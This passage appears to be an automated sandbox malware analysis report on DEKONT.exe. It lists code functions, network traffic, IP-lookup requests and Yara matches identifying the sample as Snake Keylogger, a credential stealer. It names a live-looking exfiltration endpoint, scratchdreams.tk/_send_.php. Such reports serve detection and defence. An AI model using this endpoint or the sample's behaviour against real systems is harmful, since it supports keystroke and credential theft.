Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 05B20F11h	3_2_05B20C60
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 05B2E219h	3_2_05B2DF70
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 05B2D969h	3_2_05B2D6C0
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 05B2D0B9h	3_2_05B2CE10
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 05B2CC61h	3_2_05B2C9B8
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 05B21C31h	3_2_05B21980
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 05B2FC29h	3_2_05B2F980
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 05B2C3B1h	3_2_05B2C108
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 05B2F379h	3_2_05B2F0D0
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 05B21371h	3_2_05B210C0
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 05B2EAC9h	3_2_05B2E820
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 05B2021Dh	3_2_05B20040
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 05B20BA7h	3_2_05B20040
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 05B2E671h	3_2_05B2E3C8
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 05B2D511h	3_2_05B2D268
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 05B22658h	3_2_05B22240
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 06CE8D95h	3_2_06CE8A58
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 06CE72C9h	3_2_06CE7020
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 06CE6169h	3_2_06CE5EC0
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 06CE5D11h	3_2_06CE5A68
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 06CE88A9h	3_2_06CE8600
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 06CE6E71h	3_2_06CE6BC8
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	3_2_06CE37FB
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 06CE6A19h	3_2_06CE6770
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 06CE65C1h	3_2_06CE6318
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 06CE7BA1h	3_2_06CE78F8
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 06CE0B99h	3_2_06CE08F0
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 06CE0741h	3_2_06CE0498
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 06CE774Ah	3_2_06CE74A0
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 06CE02E9h	3_2_06CE0040
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	3_2_06CE3808
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 06CE5891h	3_2_06CE55E8
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 06CE8451h	3_2_06CE81A8
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 06CE1449h	3_2_06CE11A0
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 06CE0FF1h	3_2_06CE0D48
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 4x nop then jmp 06CE7FF9h	3_2_06CE7D50

Networking

Yara detected Generic Downloader

Source: Yara match	File source: 3.2.DEKONT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DEKONT.exe.5056a70.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DEKONT.exe.4f92230.8.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.21.67.152 104.21.67.152
Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168
Source: Joe Sandbox View	IP Address: 104.21.27.85 104.21.27.85

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: checkip.dyndns.org

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.8:49709 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: checkip.dyndns.org

Source: DEKONT.exe, 00000003.00000002.3822157482.0000000003099000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003155000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003191000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003182000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003147000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.000000000312C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: DEKONT.exe, 00000003.00000002.3822157482.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003099000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003155000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003191000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003163000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003182000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003147000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.000000000312C000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.000000000308D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: DEKONT.exe, 00000003.00000002.3822157482.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: DEKONT.exe, 00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: DEKONT.exe, 00000003.00000002.3822157482.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003155000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003191000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003182000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003147000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.000000000312C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: DEKONT.exe, 00000003.00000002.3822157482.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: DEKONT.exe, 00000003.00000002.3822157482.000000000319F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://scratchdreams.tk
Source: DEKONT.exe	String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: DEKONT.exe, 00000003.00000002.3822157482.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003099000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003155000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003191000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003182000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003147000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.000000000312C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: DEKONT.exe, 00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003099000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: DEKONT.exe, 00000003.00000002.3822157482.000000000312C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/154.16.105.36
Source: DEKONT.exe, 00000003.00000002.3822157482.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003155000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003191000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003182000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003147000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.000000000312C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/154.16.105.36$
Source: DEKONT.exe, 00000003.00000002.3822157482.0000000003147000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/154.16.105.36(
Source: DEKONT.exe, 00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.000000000319F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scratchdreams.tk
Source: DEKONT.exe, 00000003.00000002.3822157482.000000000319F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scratchdreams.tk/_send_.php?TS

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724

Source: unknown

HTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.8:49725 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.DEKONT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.DEKONT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.DEKONT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.DEKONT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.DEKONT.exe.5056a70.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.DEKONT.exe.5056a70.7.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.DEKONT.exe.5056a70.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.DEKONT.exe.5056a70.7.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.DEKONT.exe.5056a70.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.DEKONT.exe.5056a70.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.DEKONT.exe.5056a70.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.DEKONT.exe.5056a70.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.DEKONT.exe.4f92230.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.DEKONT.exe.4f92230.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.DEKONT.exe.4f92230.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: DEKONT.exe PID: 7384, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: DEKONT.exe PID: 7384, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: DEKONT.exe PID: 7564, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: DEKONT.exe PID: 7564, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 0_2_017FDFE4	0_2_017FDFE4
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 0_2_032A12A0	0_2_032A12A0
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 0_2_05976E40	0_2_05976E40
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 0_2_05970598	0_2_05970598
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 0_2_05970589	0_2_05970589
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 0_2_05976E31	0_2_05976E31
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 0_2_059A7684	0_2_059A7684
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 0_2_059A766D	0_2_059A766D
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 0_2_059ABC20	0_2_059ABC20
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 0_2_07AB04B8	0_2_07AB04B8
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 0_2_07AB01A0	0_2_07AB01A0
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 0_2_07ABC7A8	0_2_07ABC7A8
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 0_2_07ABC7B8	0_2_07ABC7B8
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 0_2_07AB04A8	0_2_07AB04A8
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 0_2_07AB0190	0_2_07AB0190
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 0_2_07AB1139	0_2_07AB1139
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 0_2_07ABB101	0_2_07ABB101
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 0_2_07AB1148	0_2_07AB1148
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 0_2_07AB3FA1	0_2_07AB3FA1
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 0_2_07AB3FB0	0_2_07AB3FB0
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 0_2_07AB3F50	0_2_07AB3F50
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 0_2_07ABACD8	0_2_07ABACD8
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 0_2_07AB7C38	0_2_07AB7C38
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 0_2_07ABCBF0	0_2_07ABCBF0
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 0_2_07AB2A80	0_2_07AB2A80
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 0_2_07AB2A6F	0_2_07AB2A6F
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_02DCB388	3_2_02DCB388
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_02DCC1F0	3_2_02DCC1F0
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_02DC6168	3_2_02DC6168
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_02DCC7B2	3_2_02DCC7B2
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_02DCC4D0	3_2_02DCC4D0
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_02DCCA92	3_2_02DCCA92
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_02DC4B31	3_2_02DC4B31
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_02DC68E0	3_2_02DC68E0
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_02DC98B8	3_2_02DC98B8
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_02DCBF10	3_2_02DCBF10
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_02DCBC32	3_2_02DCBC32
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_02DCF4E8	3_2_02DCF4E8
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_02DC35CA	3_2_02DC35CA
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_02DCB552	3_2_02DCB552
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_02DCEA08	3_2_02DCEA08
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_02DCE9F8	3_2_02DCE9F8
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_02DCF941	3_2_02DCF941
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B24490	3_2_05B24490
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B289B0	3_2_05B289B0
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B29080	3_2_05B29080
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B2DB18	3_2_05B2DB18
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B21DE0	3_2_05B21DE0
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B21DD0	3_2_05B21DD0
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B21520	3_2_05B21520
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B2F528	3_2_05B2F528
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B21510	3_2_05B21510
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B2F518	3_2_05B2F518
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B2C560	3_2_05B2C560
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B2C550	3_2_05B2C550
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B24480	3_2_05B24480
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B2EC78	3_2_05B2EC78
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B20C60	3_2_05B20C60
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B2EC69	3_2_05B2EC69
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B20C50	3_2_05B20C50
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B27FF8	3_2_05B27FF8
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B2DF70	3_2_05B2DF70
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B2DF60	3_2_05B2DF60
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B2D6B0	3_2_05B2D6B0
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B2D6C0	3_2_05B2D6C0
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B2CE10	3_2_05B2CE10
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B2CE01	3_2_05B2CE01
Source: C:\Users\user\Desktop\DEKONT.exe	Code function: 3_2_05B2C9B8	3_2_05B2C9B8
